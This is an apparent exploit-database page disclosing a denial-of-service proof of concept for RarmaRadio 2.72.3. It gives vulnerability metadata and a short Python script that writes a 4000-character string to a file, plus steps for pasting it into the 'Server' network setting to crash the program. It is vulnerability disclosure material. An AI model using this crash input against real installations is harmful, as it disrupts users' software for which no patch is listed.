header-logo
Suggest Exploit
vendor:
RarmaRadio
by:
Victor Mondragón
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: RarmaRadio
Affected Version From: 2.72.3
Affected Version To: 2.72.3
Patch Exists: NO
Related CWE: N/A
CPE: a:raimersoft:rarmaradio
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 Service Pack 1 x64
2019

RarmaRadio 2.72.3 – ‘Server’ Denial of Service (PoC)

RarmaRadio 2.72.3 is vulnerable to a denial of service attack when a maliciously crafted string is sent to the 'Server' field in the 'Network' settings. When the malicious string is sent, the application crashes.

Mitigation:

Users should avoid entering untrusted input into the 'Server' field in the 'Network' settings of RarmaRadio 2.72.3.
Source

Exploit-DB raw data:

#Exploit Title: RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-21
#Vendor Homepage: http://www.raimersoft.com/
#Software Link: www.raimersoft.com/downloads/rarmaradio_setup.exe
#Tested Version: 2.72.3
#Tested on: Windows 7 Service Pack 1 x64

#Steps to produce the crash:
#1.- Run python code: rarmaradio_server.py
#2.- Open rarma_ser.txt and copy content to clipboard
#3.- Open RarmaRadio
#4.- Select "Edit" > "Settings" > "Network"
#5.- In "Server" field paste Clipboard
#6.- Select "OK"
#7.- Crashed

cod = "\x41" * 4000

f = open('rarma_ser.txt', 'w')
f.write(cod)
f.close()